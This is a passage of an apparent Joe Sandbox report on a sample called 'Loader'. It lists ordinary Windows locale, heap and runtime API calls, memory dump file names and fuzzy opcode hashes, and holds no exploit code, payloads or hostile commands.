                                                                                        • Part of subcall function 002C24EA: SetLastError.KERNEL32(00000000,?,?,00000028,002BEB13), ref: 002C2590
                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 002C7B34
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3526354376.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3526310768.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526419418.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526484600.00000000002E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526519722.00000000002E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526556477.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526602591.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$InfoLocale
                                                                                      • String ID:
                                                                                      • API String ID: 3736152602-0
                                                                                      • Opcode ID: 467f8af5d051002c333fa8b370aa737db0ea948f08efcfa67a91e5dc0ec525b6
                                                                                      • Instruction ID: 25d474e9ef9397a84594b794818d32d60a14c577b5248cb252377e2c0effc7da
                                                                                      • Opcode Fuzzy Hash: 467f8af5d051002c333fa8b370aa737db0ea948f08efcfa67a91e5dc0ec525b6
                                                                                      • Instruction Fuzzy Hash: 0921B632664206ABEB28AE14DC41F7A73A8EF04314F10417EF915D6141EB74AD24CE50
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3526354376.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3526310768.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526419418.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526484600.00000000002E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526519722.00000000002E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526556477.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526602591.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 0
                                                                                      • API String ID: 0-4108050209
                                                                                      • Opcode ID: 12e672ff9eb1ba61bb24bb520e27fe6768ad8cd7698f971b65665912994579b6
                                                                                      • Instruction ID: 1b9055999af23ead9144b1d5bb45c6c77a8358f1a71caa0524531cc0b034ce26
                                                                                      • Opcode Fuzzy Hash: 12e672ff9eb1ba61bb24bb520e27fe6768ad8cd7698f971b65665912994579b6
                                                                                      • Instruction Fuzzy Hash: 25B1047092060B8FCB28CF68C6956FEBBB1EF00384F14461ED5A297681D774AD61CB63
                                                                                      APIs
                                                                                        • Part of subcall function 002C24EA: GetLastError.KERNEL32(00000000,?,002C486D), ref: 002C24EE
                                                                                        • Part of subcall function 002C24EA: SetLastError.KERNEL32(00000000,?,?,00000028,002BEB13), ref: 002C2590
                                                                                      • EnumSystemLocalesW.KERNEL32(002C7820,00000001,00000000,?,-00000050,?,002C7603,00000000,-00000002,00000000,?,00000055,?), ref: 002C77EA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3526354376.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3526310768.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526419418.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526484600.00000000002E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526519722.00000000002E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526556477.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526602591.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$EnumLocalesSystem
                                                                                      • String ID:
                                                                                      • API String ID: 2417226690-0
                                                                                      • Opcode ID: 6085e933345a8c1fc7c9b2fa2901b46b6d6cef14e704d9e0ff5767c7a0783d96
                                                                                      • Instruction ID: 7f91cba97fa03e9f042495a0f1dff325867704de534ac895a6d801f1b87d14f2
                                                                                      • Opcode Fuzzy Hash: 6085e933345a8c1fc7c9b2fa2901b46b6d6cef14e704d9e0ff5767c7a0783d96
                                                                                      • Instruction Fuzzy Hash: C51129372143059FDB289F39C895B7AB791FF80358B14862CE94687A40D771B812CB40
                                                                                      APIs
                                                                                        • Part of subcall function 002C24EA: GetLastError.KERNEL32(00000000,?,002C486D), ref: 002C24EE
                                                                                        • Part of subcall function 002C24EA: SetLastError.KERNEL32(00000000,?,?,00000028,002BEB13), ref: 002C2590
                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 002C7C54
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3526354376.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3526310768.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526419418.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526484600.00000000002E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526519722.00000000002E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526556477.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526602591.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$InfoLocale
                                                                                      • String ID:
                                                                                      • API String ID: 3736152602-0
                                                                                      • Opcode ID: f63cb904e472adbab021c404219d647f9f5ef8123a8243a88e9565869be13b75
                                                                                      • Instruction ID: 73565ede8345d830968f30ab253b5c83c1ae5fe116f2b76dac378cc223e35313
                                                                                      • Opcode Fuzzy Hash: f63cb904e472adbab021c404219d647f9f5ef8123a8243a88e9565869be13b75
                                                                                      • Instruction Fuzzy Hash: 5E119E72664257ABDB28AF28DC46FAA77A8EF05310B10427EE502D7241EB74AD258B50
                                                                                      APIs
                                                                                        • Part of subcall function 002C24EA: GetLastError.KERNEL32(00000000,?,002C486D), ref: 002C24EE
                                                                                        • Part of subcall function 002C24EA: SetLastError.KERNEL32(00000000,?,?,00000028,002BEB13), ref: 002C2590
                                                                                      • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,002C7A3C,00000000,00000000,?), ref: 002C7DD9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3526354376.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3526310768.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526419418.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526484600.00000000002E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526519722.00000000002E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526556477.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526602591.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$InfoLocale
                                                                                      • String ID:
                                                                                      • API String ID: 3736152602-0
                                                                                      • Opcode ID: 32c86c20bf86813b4e8ceb7bc71456bd8cb9b380eee6be7875ddd629dd94338e
                                                                                      • Instruction ID: 924af2d66afac93cae51e35967ba4594fccdf874116878b2b4ed5e60c0ea2cbe
                                                                                      • Opcode Fuzzy Hash: 32c86c20bf86813b4e8ceb7bc71456bd8cb9b380eee6be7875ddd629dd94338e
                                                                                      • Instruction Fuzzy Hash: AE01D637624113ABDB2C5A258C06FBA7758EB40754F15496DEC02A3180EB70EE61CEA0
                                                                                      APIs
                                                                                        • Part of subcall function 002C24EA: GetLastError.KERNEL32(00000000,?,002C486D), ref: 002C24EE
                                                                                        • Part of subcall function 002C24EA: SetLastError.KERNEL32(00000000,?,?,00000028,002BEB13), ref: 002C2590
                                                                                      • EnumSystemLocalesW.KERNEL32(002C7AE0,00000001,?,?,-00000050,?,002C75CB,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?), ref: 002C7ABD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3526354376.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3526310768.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526419418.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526484600.00000000002E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526519722.00000000002E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526556477.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526602591.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$EnumLocalesSystem
                                                                                      • String ID:
                                                                                      • API String ID: 2417226690-0
                                                                                      • Opcode ID: 7d960c622525c017fd3f073b571d31596b3200f7fb2f6d2d94c0491900254af9
                                                                                      • Instruction ID: 26e6bf430861fbfdf0deb06d950e740ce419bf939a9caaf72c7711b144fb61ce
                                                                                      • Opcode Fuzzy Hash: 7d960c622525c017fd3f073b571d31596b3200f7fb2f6d2d94c0491900254af9
                                                                                      • Instruction Fuzzy Hash: A7F046362143055FDB245F35DC81F7BBB91EF81368B04852CF9014B680C6719D12CF50
                                                                                      APIs
                                                                                        • Part of subcall function 002BE891: EnterCriticalSection.KERNEL32(?,?,002C2978,?,002E4140,00000008,002C286A,00000000,00000000,?), ref: 002BE8A0
                                                                                      • EnumSystemLocalesW.KERNEL32(002C3490,00000001,002E41C0,0000000C,002C2E91,-00000050), ref: 002C34D5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3526354376.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3526310768.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526419418.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526484600.00000000002E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526519722.00000000002E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526556477.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526602591.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                      • String ID:
                                                                                      • API String ID: 1272433827-0
                                                                                      • Opcode ID: 923dfadac4f637ffb1b3b6c5cf2573de404222e0b7e2df547c1d2697b5bc380a
                                                                                      • Instruction ID: 2fd5871586c9827363426b666c154bca0cb7223230c5458771c29af53b6ffc30
                                                                                      • Opcode Fuzzy Hash: 923dfadac4f637ffb1b3b6c5cf2573de404222e0b7e2df547c1d2697b5bc380a
                                                                                      • Instruction Fuzzy Hash: F0F03736A903449FDB04EF98E88AB9CBBE0EB49761F10816AE5149B2A0CB754A508F40
                                                                                      APIs
                                                                                        • Part of subcall function 002C24EA: GetLastError.KERNEL32(00000000,?,002C486D), ref: 002C24EE
                                                                                        • Part of subcall function 002C24EA: SetLastError.KERNEL32(00000000,?,?,00000028,002BEB13), ref: 002C2590
                                                                                      • EnumSystemLocalesW.KERNEL32(002C7C00,00000001,?,?,?,002C7625,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?,?), ref: 002C7BEC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3526354376.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3526310768.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526419418.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526484600.00000000002E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526519722.00000000002E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526556477.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526602591.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$EnumLocalesSystem
                                                                                      • String ID:
                                                                                      • API String ID: 2417226690-0
                                                                                      • Opcode ID: e544c4a4dbc24ec14ce94fc83016c0c1f2f4f70ed44c3fb19887bf148c9d2669
                                                                                      • Instruction ID: 6cfd2391ed2d023487fff8269328d1b43e3a934996afa3466da85920307e3f6f
                                                                                      • Opcode Fuzzy Hash: e544c4a4dbc24ec14ce94fc83016c0c1f2f4f70ed44c3fb19887bf148c9d2669
                                                                                      • Instruction Fuzzy Hash: E8F0E53A30024657CB149F39DC55B6BBF94EFC2B64B46805DEA058B690C6719D93CB90
                                                                                      APIs
                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,00000000,?,002BD5E3,?,20001004,00000000,00000002,?,?,002BC4F1), ref: 002C2FC9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3526354376.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3526310768.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526419418.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526484600.00000000002E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526519722.00000000002E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526556477.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526602591.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: InfoLocale
                                                                                      • String ID:
                                                                                      • API String ID: 2299586839-0
                                                                                      • Opcode ID: e95aaa2f0821db22af066cd9b30db7c1ead0eb142901056e466b442b9e560917
                                                                                      • Instruction ID: 415f817409a4007c36dc5595b4da553ed9ca94a8f8bf96031c3805a821126a56
                                                                                      • Opcode Fuzzy Hash: e95aaa2f0821db22af066cd9b30db7c1ead0eb142901056e466b442b9e560917
                                                                                      • Instruction Fuzzy Hash: 59E04F3155025CFBCF126F60EC09FAE7E26EF44750F058629FC0966225CB728930AAD0
                                                                                      APIs
                                                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_000165C0), ref: 002B6498
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3526354376.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3526310768.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526419418.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526484600.00000000002E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526519722.00000000002E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526556477.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526602591.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                      • String ID:
                                                                                      • API String ID: 3192549508-0
                                                                                      • Opcode ID: 2ada7b8a24eabd9fe605bb41902d9cd5ec93265ff88cdd9758d13e92801b1ca8
                                                                                      • Instruction ID: a950f0323f3b79180e7030151fa2dc4af25051a1389243077f032edca89bba4b
                                                                                      • Opcode Fuzzy Hash: 2ada7b8a24eabd9fe605bb41902d9cd5ec93265ff88cdd9758d13e92801b1ca8
                                                                                      • Instruction Fuzzy Hash:
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3526354376.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3526310768.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526419418.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526484600.00000000002E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526519722.00000000002E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526556477.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526602591.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: HeapProcess
                                                                                      • String ID:
                                                                                      • API String ID: 54951025-0
                                                                                      • Opcode ID: 77b6027be5217759ec218a26f36c8421d439b81b7f1edb9371379c090d648f36
                                                                                      • Instruction ID: 373210a2861c66c91b8edafcab2368371fa83e6ea56f3aa354dab3339f3982e1
                                                                                      • Opcode Fuzzy Hash: 77b6027be5217759ec218a26f36c8421d439b81b7f1edb9371379c090d648f36
                                                                                      • Instruction Fuzzy Hash: D9A002705411C58B9740CF36798D60937D7D645691745446D9445C9160DA3444905F01
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3526354376.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3526310768.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526419418.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526484600.00000000002E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526519722.00000000002E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526556477.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526602591.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4bea1f7e112922de85933917ab521cbb84ef55e32de22e0450d87ab5f1ed1c63
                                                                                      • Instruction ID: 2174f4a8264e4d1010aa202de285fffdcdf257c2e5bdd5db1a23fcf3b09c5acf
                                                                                      • Opcode Fuzzy Hash: 4bea1f7e112922de85933917ab521cbb84ef55e32de22e0450d87ab5f1ed1c63
                                                                                      • Instruction Fuzzy Hash: 9B320522D79F414DD7239638DC26335A349AFB73C5F25D72BE81AB59A5EF29C8834100
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3526354376.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3526310768.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526419418.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526484600.00000000002E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526519722.00000000002E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526556477.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526602591.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f5fb62629c53e2f59617222d619935c38533954f1dde72350560765fc017e03e
                                                                                      • Instruction ID: 1662dc7e65d355aa7e699792d1ac182cf2497ab6324f33ee203e2c17a56e69e3
                                                                                      • Opcode Fuzzy Hash: f5fb62629c53e2f59617222d619935c38533954f1dde72350560765fc017e03e
                                                                                      • Instruction Fuzzy Hash: 82D0923A645A58AFC210CF49E440D42F7BCFB8D670B1540A6EA4897B20C331FC11CAE0
                                                                                      APIs
                                                                                      • _ValidateLocalCookies.LIBCMT ref: 002B7767
                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 002B776F
                                                                                      • _ValidateLocalCookies.LIBCMT ref: 002B77F8
                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 002B7823
                                                                                      • _ValidateLocalCookies.LIBCMT ref: 002B7878
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3526354376.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3526310768.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526419418.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526484600.00000000002E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526519722.00000000002E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526556477.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526602591.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                      • String ID: csm$pp+
                                                                                      • API String ID: 1170836740-1436284427
                                                                                      • Opcode ID: 81285870085de87508057a5d377aa5175ff2c300b8503c098a9748c7e7f28b87
                                                                                      • Instruction ID: e0d49c20d64b8229da9acb560bbcb5c68309a7b7002a6ae808b4b3200ebb5a3d
                                                                                      • Opcode Fuzzy Hash: 81285870085de87508057a5d377aa5175ff2c300b8503c098a9748c7e7f28b87
                                                                                      • Instruction Fuzzy Hash: CE41F334E242199BCF10DF68C889ADEBBA5AF84354F148165E8145B392CB71EE25CF91
                                                                                      APIs
                                                                                      • GetCPInfo.KERNEL32(029AFE18,029AFE18,00000000,7FFFFFFF,?,002D24DD,029AFE18,029AFE18,00000000,029AFE18,?,?,?,?,029AFE18,00000000), ref: 002D2598
                                                                                      • __alloca_probe_16.LIBCMT ref: 002D2653
                                                                                      • __alloca_probe_16.LIBCMT ref: 002D26E2
                                                                                      • __freea.LIBCMT ref: 002D272D
                                                                                      • __freea.LIBCMT ref: 002D2733
                                                                                      • __freea.LIBCMT ref: 002D2769
                                                                                      • __freea.LIBCMT ref: 002D276F
                                                                                      • __freea.LIBCMT ref: 002D277F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3526354376.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3526310768.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526419418.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526484600.00000000002E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526519722.00000000002E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526556477.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526602591.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: __freea$__alloca_probe_16$Info
                                                                                      • String ID:
                                                                                      • API String ID: 127012223-0
                                                                                      • Opcode ID: ef9b16ad8e623c857c09cb07fd03c3157539e4cf8b8c7676f758123910ba53a7
                                                                                      • Instruction ID: 357007e831eaabdfeef1df6828222de11fd713133e563938b13ad40436c9c23d
                                                                                      • Opcode Fuzzy Hash: ef9b16ad8e623c857c09cb07fd03c3157539e4cf8b8c7676f758123910ba53a7
                                                                                      • Instruction Fuzzy Hash: 44710972D20206DBEF319E648C91FEEB7A9DF65310F14015BEC14A7381DA75DC688BA0
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3526354376.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3526310768.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526419418.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526484600.00000000002E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526519722.00000000002E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526556477.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526602591.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: _strrchr
                                                                                      • String ID:
                                                                                      • API String ID: 3213747228-0
                                                                                      • Opcode ID: 51e6ba9edb6fa758acba511f911d2998b9b0e2e81ebecee1fdc350593847a06f
                                                                                      • Instruction ID: 960306a9def21ac69925152e3509815427c3ee6eb79e977470d543b7e1003761
                                                                                      • Opcode Fuzzy Hash: 51e6ba9edb6fa758acba511f911d2998b9b0e2e81ebecee1fdc350593847a06f
                                                                                      • Instruction Fuzzy Hash: 7DB18C72920A769FDB158F24CC41FAE7BE5EF15340F14435DE904AB282D2B4F9A1CBA0
                                                                                      APIs
                                                                                      • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,00000000,?,83182907,?,002C32F1,00000000,00000000,00000000,00000000), ref: 002C32A3
                                                                                      Strings
                                                                                      Memory Dump Source
